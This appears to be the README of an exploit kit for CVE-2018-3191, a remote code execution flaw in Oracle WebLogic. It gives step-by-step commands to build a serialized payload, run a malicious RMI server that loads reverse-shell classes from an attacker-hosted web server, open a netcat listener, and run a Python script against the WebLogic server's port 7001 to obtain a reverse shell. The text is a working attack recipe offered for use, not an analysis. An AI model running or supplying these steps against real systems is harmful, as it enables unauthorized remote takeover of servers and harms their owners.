CVE-2018-3191-Rce-Exploit

Author: Break

Step 1: java -jar GenPayload.java output SJpayload.bin, Address is RMI Server address

Step 2:java -jar RMISERVER.jar httpaddress, RMI server listening on port 1099 and load remote Reverse classes on web server

Step 3:put two files(reverse shell) LoadObject.class and StreamConnection.class on http server and can be visited by url

Step 4: nc -llp 2222

Step 5: python weblogic.py weblogicAddress 7001 SJpayload

Step 6: wait for a reverse shell, good luck